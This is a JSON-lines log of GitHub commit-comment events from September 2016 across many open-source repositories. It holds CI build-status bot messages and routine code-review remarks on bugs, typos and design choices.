{"id":"4575294529","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057330,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:22:24Z","updated_at":"2016-09-16T17:22:24Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.27%25-red.svg)</a> \n"}},"created_at":"2016-09-16T17:22:24Z"}
{"id":"4575297961","type":"CommitCommentEvent","actor":{"login":"mapsam"},"repo":{"name":"mapbox/mapbox-tile-copy"},"payload":{"comment":{"id":19057339,"position":5,"line":39,"path":"test/copy.tilelive.test.js","commit_id":"d59444c6e96b9249549042c721db55cfdcc31055","created_at":"2016-09-16T17:23:09Z","updated_at":"2016-09-16T17:23:09Z","body":"Yah, I did a bad job copying :( it's fixed in here https://github.com/mapbox/mapbox-tile-copy/pull/84/commits/e747dc53debb71a55998380e06fd548a51b602eb but we're seeing new failures with tm2z copies"}},"created_at":"2016-09-16T17:23:09Z"}
{"id":"4575302028","type":"CommitCommentEvent","actor":{"login":"dimvar"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19057351,"position":null,"line":null,"path":null,"commit_id":"05fa13a146ea9f9570994b04e7974b6d58283d37","created_at":"2016-09-16T17:24:00Z","updated_at":"2016-09-16T17:24:00Z","body":"@vobruba-martin can you provide a repro for the warning you saw? When the assignment is annotated as `@const`, like in this case, NTI should be fine with it. If you can find a repro, please file a bug."}},"created_at":"2016-09-16T17:24:00Z"}
{"id":"4575304424","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":19057357,"position":null,"line":null,"path":null,"commit_id":"aff5a971d4e7740a17c3f90284ea0f61d08cd588","created_at":"2016-09-16T17:24:31Z","updated_at":"2016-09-16T17:24:31Z","body":"++"}},"created_at":"2016-09-16T17:24:31Z"}
{"id":"4575304700","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057358,"position":50,"line":78,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/state/Done.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:24:34Z","updated_at":"2016-09-16T17:24:34Z","body":"tak -> task"}},"created_at":"2016-09-16T17:24:34Z"}
{"id":"4575306598","type":"CommitCommentEvent","actor":{"login":"Tambaz292"},"repo":{"name":"Tambaz292/tyson"},"payload":{"comment":{"id":19057364,"position":null,"line":null,"path":null,"commit_id":"b179c43e46cad44dc2d578f8b76446f7ee57b5a6","created_at":"2016-09-16T17:24:57Z","updated_at":"2016-09-16T17:24:57Z","body":"No"}},"created_at":"2016-09-16T17:24:57Z"}
{"id":"4575315568","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19057386,"position":36,"line":650,"path":"css-fonts/Fonts.src.html","commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-16T17:26:51Z","updated_at":"2016-09-16T17:26:51Z","body":"There should be a maximum value of 999."}},"created_at":"2016-09-16T17:26:51Z"}
{"id":"4575316884","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057390,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:27:10Z","updated_at":"2016-09-16T17:27:10Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-35.43%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-16T17:27:10Z"}
{"id":"4575317733","type":"CommitCommentEvent","actor":{"login":"mikevb1"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19057392,"position":177,"line":177,"path":"owapi/v3/__init__.py","commit_id":"226e12bf6ad9027c1e0fdaaefdc76d779e67a932","created_at":"2016-09-16T17:27:18Z","updated_at":"2016-09-16T17:27:18Z","body":"Here's [a short description](http://stackoverflow.com/a/448279) with a link to the official documentation."}},"created_at":"2016-09-16T17:27:18Z"}
{"id":"4575320038","type":"CommitCommentEvent","actor":{"login":"Barryrowe"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19057395,"position":null,"line":null,"path":null,"commit_id":"6ed32efe2759fafb75dcd80856a29b4f70343ffc","created_at":"2016-09-16T17:27:46Z","updated_at":"2016-09-16T17:27:46Z","body":"Am I missing something, or does this clobber the only ability to quickly get a reference to a directory?\r\n\r\nBefore this update we could use ```checkDir()``` to get a handle on the directory in question. Now we just get a boolean, and there's no  public ```getDirectory()``` to replace this functionality."}},"created_at":"2016-09-16T17:27:46Z"}
{"id":"4575320099","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057396,"position":null,"line":null,"path":null,"commit_id":"9eb62af11ad8932ad0ef62d105143db5ff8f4d03","created_at":"2016-09-16T17:27:47Z","updated_at":"2016-09-16T17:27:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1034](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13461&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T17:27:47Z"}
{"id":"4575321034","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19057399,"position":null,"line":null,"path":null,"commit_id":"38db25d0dd79403aa73e01ac8528f2bb3aa73fc6","created_at":"2016-09-16T17:27:59Z","updated_at":"2016-09-16T17:27:59Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-38db25d0dd79403aa73e01ac8528f2bb3aa73fc6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T17:27:59Z"}
{"id":"4575321525","type":"CommitCommentEvent","actor":{"login":"crosbymichael"},"repo":{"name":"docker/docker"},"payload":{"comment":{"id":19057402,"position":34,"line":34,"path":"client/node_list.go","commit_id":"7c36a1af031b510cd990cf488ee5998a3efb450f","created_at":"2016-09-16T17:28:04Z","updated_at":"2016-09-16T17:28:04Z","body":"you need the full import path in your main for this to work and you cannot call `ensureReaderClosed` because it is a local function only to be used by the client. "}},"created_at":"2016-09-16T17:28:04Z"}
{"id":"4575322261","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057406,"position":50,"line":78,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/state/Done.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:28:14Z","updated_at":"2016-09-16T17:28:14Z","body":"Task status in aborted for output error"}},"created_at":"2016-09-16T17:28:14Z"}
{"id":"4575322601","type":"CommitCommentEvent","actor":{"login":"stuzart"},"repo":{"name":"seek4science/seek"},"payload":{"comment":{"id":19057408,"position":null,"line":null,"path":null,"commit_id":"1485f38574cb72d812fb4ed5d37eccbfa6662243","created_at":"2016-09-16T17:28:18Z","updated_at":"2016-09-16T17:28:18Z","body":"Thanks for spotting that. The schema is OK, those tables were dropped a long time ago. It looks like they got readded by Quyens bug-fixes merge - she must have been using an inconsistent database. I'll double check on Monday but all looks OK."}},"created_at":"2016-09-16T17:28:18Z"}
{"id":"4575323702","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19057414,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T17:28:32Z","updated_at":"2016-09-16T17:28:32Z","body":"Ok, thanks. Rolled back to old solution: https://github.com/EpochModTeam/DayZ-Epoch/commit/bcc16a013520dcc243c306b178d3864dc4fec456"}},"created_at":"2016-09-16T17:28:32Z"}
{"id":"4575326685","type":"CommitCommentEvent","actor":{"login":"mmafe"},"repo":{"name":"ccswbs/hjckrrh"},"payload":{"comment":{"id":19057424,"position":null,"line":null,"path":null,"commit_id":"2335aef1090089612f1ba4b013a795ccac16d27c","created_at":"2016-09-16T17:29:07Z","updated_at":"2016-09-16T17:29:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;t24hZLTR&#x2F;1729-1-fix-updatefeature-class-so-feature-nodes-are-migrated-properly-1-hr\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (1) Fix UpdateFeature class so feature nodes are migrated properly - 1 hr</a>"}},"created_at":"2016-09-16T17:29:07Z"}
{"id":"4575327149","type":"CommitCommentEvent","actor":{"login":"Vukkert"},"repo":{"name":"Vukkert/ladno"},"payload":{"comment":{"id":19057427,"position":null,"line":null,"path":null,"commit_id":"3b002d60b573d5e69c283b0deaba6c53c43489da","created_at":"2016-09-16T17:29:12Z","updated_at":"2016-09-16T17:29:12Z","body":"<html>\r\n<body>\r\n<script>\r\n'use strict';\r\nalert('5'>'!');\r\n</script>\r\n</body>\r\n</html>"}},"created_at":"2016-09-16T17:29:12Z"}
{"id":"4575328405","type":"CommitCommentEvent","actor":{"login":"Lucrecious"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19057432,"position":32,"line":32,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T17:29:25Z","updated_at":"2016-09-16T17:29:25Z","body":"That's fair.\r\n\r\nOn your reply to the other post - I finally understand what's happening - I was confused :) Thanks!"}},"created_at":"2016-09-16T17:29:25Z"}
{"id":"4575333172","type":"CommitCommentEvent","actor":{"login":"Ichimonji10"},"repo":{"name":"elyezer/pulp-smash"},"payload":{"comment":{"id":19057440,"position":null,"line":null,"path":null,"commit_id":"81940109c4ec4edfaccca6a55a166145200e8d3a","created_at":"2016-09-16T17:30:20Z","updated_at":"2016-09-16T17:30:20Z","body":"I can verify that the test suite successfully executes with this patch applied. I tested this change by executing the following command against a Pulp 2.10.1 system:\r\n\r\n    python -m unittest discover pulp_smash.tests"}},"created_at":"2016-09-16T17:30:20Z"}
{"id":"4575334838","type":"CommitCommentEvent","actor":{"login":"johnno1962"},"repo":{"name":"apple/swift-corelibs-foundation"},"payload":{"comment":{"id":19057447,"position":5,"line":787,"path":"CoreFoundation/Base.subproj/CFUtilities.c","commit_id":"bc4cabbddc8cd725b159b47c6eb6d6973237e31d","created_at":"2016-09-16T17:30:38Z","updated_at":"2016-09-16T17:30:38Z","body":"Pushed a rework. Couldn’t get a useful app name out of _CFGetProgname() (CFProcessName() is declared in the header but not defined anywhere!) so “Swift” it is for now. Tried using CFStringGetCStringPtr() but the strings did not seem to be null terminated :(\r\n\r\nW/app_process32(30898): Match\r\nW/app_process32(30898): Display\r\nW/app_process32(30898): Done \r\nW/app_process32(30898): Sleeping��\u001d�(\r\n"}},"created_at":"2016-09-16T17:30:38Z"}
{"id":"4575334964","type":"CommitCommentEvent","actor":{"login":"willy-b"},"repo":{"name":"brave/ledger-client"},"payload":{"comment":{"id":19057449,"position":57,"line":51,"path":"index.js","commit_id":"d38a8bc67d8c1d82885aac2c2cf427b47c378389","created_at":"2016-09-16T17:30:40Z","updated_at":"2016-09-16T17:30:40Z","body":"note: `this` is not bound to the Client instance inside the `_updateRules` callback, so the `this._log` in the error handler throws an error and crashes Brave if `_updateRules` has a problem. E.g.:\r\n```\r\nTypeError: this._log is not a function\r\n    at /home/willy/projs/git/3rd/brave/browser-laptop/node_modules/ledger-client/index.js:57:54\r\n    at /home/willy/projs/git/3rd/brave/browser-laptop/node_modules/ledger-client/index.js:565:21\r\n    at request.request.err0 (/home/willy/projs/git/3rd/brave/browser-laptop/app/ledger.js:910:21)\r\n    at Function.defaultSession.webRequest.fetch (/home/willy/projs/git/3rd/brave/browser-laptop/js/lib/request.js:48:21)\r\nprocess exited with code 7\r\n[BRAVE CRASHES]\r\n```\r\nEither replacing `this._log` with `self._log` or adding a `.bind(this)` to the callback will fix."}},"created_at":"2016-09-16T17:30:40Z"}
{"id":"4575336909","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19057452,"position":2,"line":1,"path":"style.css","commit_id":"c8a97e304afd97d140271110e050aafe092040a7","created_at":"2016-09-16T17:31:05Z","updated_at":"2016-09-16T17:31:05Z","body":"test"}},"created_at":"2016-09-16T17:31:05Z"}
{"id":"4575336980","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057453,"position":90,"line":114,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/state/Running.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:31:07Z","updated_at":"2016-09-16T17:31:07Z","body":"Do not try and catch the same exception. Just keep it"}},"created_at":"2016-09-16T17:31:07Z"}
{"id":"4575341877","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057474,"position":60,"line":84,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/state/Running.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:32:07Z","updated_at":"2016-09-16T17:32:07Z","body":"Not needed. Exit condition on previous catch"}},"created_at":"2016-09-16T17:32:07Z"}
{"id":"4575342146","type":"CommitCommentEvent","actor":{"login":"evaleev"},"repo":{"name":"ValeevGroup/tiledarray"},"payload":{"comment":{"id":19057476,"position":91,"line":134,"path":"src/TiledArray/expressions/expr.h","commit_id":"d4e84cf6d01870b70dd04d3934c60298699db7e1","created_at":"2016-09-16T17:32:11Z","updated_at":"2016-09-16T17:32:11Z","body":"is this wait purely for throttling? can I just copy Futures and move on?"}},"created_at":"2016-09-16T17:32:11Z"}
{"id":"4575342755","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19057479,"position":null,"line":null,"path":null,"commit_id":"87786b3576bf0367e2c690ecd0faae43ade30bb7","created_at":"2016-09-16T17:32:17Z","updated_at":"2016-09-16T17:32:17Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-87786b3576bf0367e2c690ecd0faae43ade30bb7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-87786b3576bf0367e2c690ecd0faae43ade30bb7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T17:32:17Z"}
{"id":"4575343045","type":"CommitCommentEvent","actor":{"login":"DanielePalombo"},"repo":{"name":"nebulab/solidus_related_products"},"payload":{"comment":{"id":19057482,"position":6,"line":6,"path":"app/assets/stylesheets/spree/backend/solidus_related_products.scss","commit_id":"b7e672f170dab4090de290c50bf12f17f121a648","created_at":"2016-09-16T17:32:20Z","updated_at":"2016-09-16T17:32:20Z","body":"@kennyadsl help,\r\n\r\nWhen i use `make-row()`, this make errors without import  'solidus_admin/bootstrap/bootstrap', but when i include this the admin interface looks different. \r\nMaybe i'm wrong what is the flow for change backend interface? \r\n\r\nThanks"}},"created_at":"2016-09-16T17:32:20Z"}
{"id":"4575345142","type":"CommitCommentEvent","actor":{"login":"timothyqiu"},"repo":{"name":"fffonion/Xunlei-Fastdick"},"payload":{"comment":{"id":19057487,"position":17,"line":243,"path":"swjsq.py","commit_id":"2b4f5e5d8f2075dc7564bc17d784192e145a3e44","created_at":"2016-09-16T17:32:46Z","updated_at":"2016-09-16T17:32:46Z","body":"If you return here, 81 won't be tried when 82 is unavailable..."}},"created_at":"2016-09-16T17:32:46Z"}
{"id":"4575345259","type":"CommitCommentEvent","actor":{"login":"Soulou"},"repo":{"name":"kenshinx/godns"},"payload":{"comment":{"id":19057489,"position":35,"line":83,"path":"hosts.go","commit_id":"8e14764aa715908002a632a60bc4508e0ccefee0","created_at":"2016-09-16T17:32:47Z","updated_at":"2016-09-16T17:32:47Z","body":"Does it make sense to reduce it to 5sec instead of 1 min? If yes, please explain and change the above comment"}},"created_at":"2016-09-16T17:32:47Z"}
{"id":"4575349077","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057500,"position":null,"line":null,"path":null,"commit_id":"daf0564c06d088b1c88f6bed01c464c4fb25d8fc","created_at":"2016-09-16T17:33:34Z","updated_at":"2016-09-16T17:33:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1033](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13458&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:11:35"}},"created_at":"2016-09-16T17:33:34Z"}
{"id":"4575352974","type":"CommitCommentEvent","actor":{"login":"TinyTyler"},"repo":{"name":"brooklynpacket/cocos2d-x"},"payload":{"comment":{"id":19057511,"position":20,"line":20,"path":"cocos/platform/ios/BPCHelper-ios.mm","commit_id":"8788dd3d19e8eec8e95712c7c1c6960a153b6b1e","created_at":"2016-09-16T17:34:23Z","updated_at":"2016-09-16T17:34:23Z","body":"`a_isIOS9` could just be moved here and static initialized so that `isInited` can be removed and this becomes a 2-liner: init static, return static."}},"created_at":"2016-09-16T17:34:23Z"}
{"id":"4575360390","type":"CommitCommentEvent","actor":{"login":"fmarco76"},"repo":{"name":"FutureGateway/APIServer"},"payload":{"comment":{"id":19057531,"position":75,"line":99,"path":"src/main/java/it/infn/ct/futuregateway/apiserver/inframanager/state/Running.java","commit_id":"5d6053b7a83eb0b7130bb328641bfa1fffba5d5d","created_at":"2016-09-16T17:35:55Z","updated_at":"2016-09-16T17:35:55Z","body":"Manage with Task.STATE.CANCELLED"}},"created_at":"2016-09-16T17:35:55Z"}
{"id":"4575364180","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19057540,"position":null,"line":null,"path":null,"commit_id":"9eb62af11ad8932ad0ef62d105143db5ff8f4d03","created_at":"2016-09-16T17:36:39Z","updated_at":"2016-09-16T17:36:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1034](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13461&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:08:52"}},"created_at":"2016-09-16T17:36:39Z"}
{"id":"4575364718","type":"CommitCommentEvent","actor":{"login":"mbreyes"},"repo":{"name":"aguiarla/gonogo"},"payload":{"comment":{"id":19057541,"position":null,"line":null,"path":null,"commit_id":"27f46c3b05de9a304c01642afff4fa26cf62552e","created_at":"2016-09-16T17:36:45Z","updated_at":"2016-09-16T17:36:45Z","body":"Não há necessidade de colcoar 0.2 e 0.3, creio que poderia ser somente 0.1 tanto no s10 como no s11. Mas isso tem pouco efeito então vamos deixar dessa maneira.\r\n"}},"created_at":"2016-09-16T17:36:45Z"}
{"id":"4575365724","type":"CommitCommentEvent","actor":{"login":"justusc"},"repo":{"name":"ValeevGroup/tiledarray"},"payload":{"comment":{"id":19057543,"position":91,"line":134,"path":"src/TiledArray/expressions/expr.h","commit_id":"d4e84cf6d01870b70dd04d3934c60298699db7e1","created_at":"2016-09-16T17:36:57Z","updated_at":"2016-09-16T17:36:57Z","body":"This is not purely for throttling. The wait is required to manage lifetime of expression objects. The wait will exit before the tasks for the last operation have run to completion. So you should still get overlap with tasks in subsequent expressions."}},"created_at":"2016-09-16T17:36:57Z"}
{"id":"4575368234","type":"CommitCommentEvent","actor":{"login":"oliviertassinari"},"repo":{"name":"oliviertassinari/material-ui"},"payload":{"comment":{"id":19057554,"position":21,"line":41,"path":"docs/src/app/components/pages/components/DatePicker/ExampleInternational.js","commit_id":"2c8c317f1a815afabc178c6149b7259b3cec77cf","created_at":"2016-09-16T17:37:28Z","updated_at":"2016-09-16T17:37:28Z","body":"@mehdijjz I'm gonna update the master branch with your suggestion."}},"created_at":"2016-09-16T17:37:28Z"}
{"id":"4575370885","type":"CommitCommentEvent","actor":{"login":"justusc"},"repo":{"name":"ValeevGroup/tiledarray"},"payload":{"comment":{"id":19057564,"position":91,"line":134,"path":"src/TiledArray/expressions/expr.h","commit_id":"d4e84cf6d01870b70dd04d3934c60298699db7e1","created_at":"2016-09-16T17:38:00Z","updated_at":"2016-09-16T17:38:00Z","body":"Also, remember we experimented with removing this line at the beginning of the year. It did not go well."}},"created_at":"2016-09-16T17:38:00Z"}
{"id":"4575377162","type":"CommitCommentEvent","actor":{"login":"kevin50406418"},"repo":{"name":"csie-asia/windowprogramming-ex20160914-Jonhson1997"},"payload":{"comment":{"id":19057575,"position":null,"line":null,"path":null,"commit_id":"def1116f70bd9e617308599e6f712014da4edef1","created_at":"2016-09-16T17:39:16Z","updated_at":"2016-09-16T17:39:16Z","body":":+1::+1::+1:"}},"created_at":"2016-09-16T17:39:16Z"}
{"id":"4575378187","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"mariospr/flatpak"},"payload":{"comment":{"id":19057578,"position":null,"line":null,"path":null,"commit_id":"05a618f30250151762855da845b4ac1906d6e23c","created_at":"2016-09-16T17:39:28Z","updated_at":"2016-09-16T17:39:28Z","body":"I wonder if it wouldn't be a better fix (and one you could send to Debian) to not do this when the system repo already exists."}},"created_at":"2016-09-16T17:39:28Z"}
{"id":"4575381171","type":"CommitCommentEvent","actor":{"login":"prtfish"},"repo":{"name":"joelcreswell/promisezones"},"payload":{"comment":{"id":19057588,"position":9,"line":9,"path":"data management plan","commit_id":"28860ea91a5b3bae4b9e42c093c916aecd69c5f8","created_at":"2016-09-16T17:40:06Z","updated_at":"2016-09-16T17:40:06Z","body":"Revised #2. Create map w/ promisezone and ej screen layers\r\n\r\nRemove #3"}},"created_at":"2016-09-16T17:40:06Z"}
{"id":"4575385673","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"mariospr/flatpak"},"payload":{"comment":{"id":19057603,"position":null,"line":null,"path":null,"commit_id":"05a618f30250151762855da845b4ac1906d6e23c","created_at":"2016-09-16T17:40:51Z","updated_at":"2016-09-16T17:40:51Z","body":"(But I won't block this PR for it!)"}},"created_at":"2016-09-16T17:40:51Z"}
{"id":"4575385791","type":"CommitCommentEvent","actor":{"login":"cg5-"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19057604,"position":97,"line":97,"path":"Mage.Sets/src/mage/sets/kaladesh/OviyaPashiriSageLifecrafter.java","commit_id":"3fb5a60202fb45047123fd0be34c4f167fbb0a39","created_at":"2016-09-16T17:40:52Z","updated_at":"2016-09-16T17:40:52Z","body":"This is wrong, it contradicts these two statements from the release notes:\r\n\r\n* The value of X is determined only as Oviya Pashiri’s last ability resolves. The token’s power and toughness won’t change as the number of creatures you control changes.\r\n\r\n* The Construct token you’re creating doesn’t count towards X for the ability that creates it."}},"created_at":"2016-09-16T17:40:52Z"}
{"id":"4575386236","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19057605,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T17:40:57Z","updated_at":"2016-09-16T17:40:57Z","body":"We can discuss in mantis. But actually : debug=0 : no log is set for error and warning ..... because of https://github.com/LimeSurvey/LimeSurvey/blob/master/index.php#L160 error_reporting(0) , use ini_set('display_errors', 0); can fix the issue : allow using logging of error and warning in file, without show error to users.\r\n\r\n"}},"created_at":"2016-09-16T17:40:57Z"}
{"id":"4575387524","type":"CommitCommentEvent","actor":{"login":"fbiville"},"repo":{"name":"fpavageau/neo4j-sproc-compiler"},"payload":{"comment":{"id":19057606,"position":null,"line":null,"path":null,"commit_id":"7d9b20778bfd1a1ed6bb3afea560e28141c554c1","created_at":"2016-09-16T17:41:13Z","updated_at":"2016-09-16T17:41:13Z","body":"Yep, I think that's a good solution, having both provided+optional."}},"created_at":"2016-09-16T17:41:13Z"}
{"id":"4575391513","type":"CommitCommentEvent","actor":{"login":"MrLint"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19057622,"position":null,"line":null,"path":null,"commit_id":"039630be189b8edd4039338c8a3c12ddcf4253ce","created_at":"2016-09-16T17:42:03Z","updated_at":"2016-09-16T17:42:03Z","body":"I appreciate your efforts."}},"created_at":"2016-09-16T17:42:03Z"}
{"id":"4575392097","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"fffonion/Xunlei-Fastdick"},"payload":{"comment":{"id":19057623,"position":17,"line":243,"path":"swjsq.py","commit_id":"2b4f5e5d8f2075dc7564bc17d784192e145a3e44","created_at":"2016-09-16T17:42:10Z","updated_at":"2016-09-16T17:42:10Z","body":"Good point"}},"created_at":"2016-09-16T17:42:10Z"}
{"id":"4575398314","type":"CommitCommentEvent","actor":{"login":"mariospr"},"repo":{"name":"mariospr/flatpak"},"payload":{"comment":{"id":19057636,"position":null,"line":null,"path":null,"commit_id":"05a618f30250151762855da845b4ac1906d6e23c","created_at":"2016-09-16T17:43:26Z","updated_at":"2016-09-16T17:43:26Z","body":"I haven't really stopped to understand the real purpose of this fix, but sounds reasonable to me, although I would do it as part of a separate ticket and leave this as part of the upgrade to 0.6.10."}},"created_at":"2016-09-16T17:43:26Z"}
{"id":"4575401657","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19057642,"position":null,"line":null,"path":null,"commit_id":"c247160a5fa6028d02adbc0dab506cd45564eede","created_at":"2016-09-16T17:44:09Z","updated_at":"2016-09-16T17:44:09Z","body":"I will redo sorting loop as i think this doesnt need another loop. "}},"created_at":"2016-09-16T17:44:09Z"}
{"id":"4575402512","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19057644,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-16T17:44:18Z","updated_at":"2016-09-16T17:44:18Z","body":"Oh, I thought you were trying to make more readable aliases of common power functions. That answers my first two bullets but the third should still be addressed. Right?\r\n\r\nAnother thing coming to mind is that functions like these might not be used by many. Potential users of `squareNumber` would know that they need to compute the square but many of them wouldn't know that there is a name for that number and if they do they might not expect that a function for that exists. Since every peace of code comes with a cost for testing, documentation, making it work with many simulators, maintenance and more we need to draw a line somewhere. This is a discussion related to the project mission we have yet to define so I'll leave it for now. The greatest value right now is what we can learn from actually go through some reviews and align our minds (that's why I'm being a bit over-zealous and paying attention to the details). \r\n"}},"created_at":"2016-09-16T17:44:18Z"}
{"id":"4575404799","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19057651,"position":15,"line":15,"path":"ozWeb/python/ozWeb/downloadImageLib.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T17:44:46Z","updated_at":"2016-09-16T17:44:46Z","body":"update the doc, even for raised exceptions in \"@exception IOError - bla bla\" format"}},"created_at":"2016-09-16T17:44:46Z"}
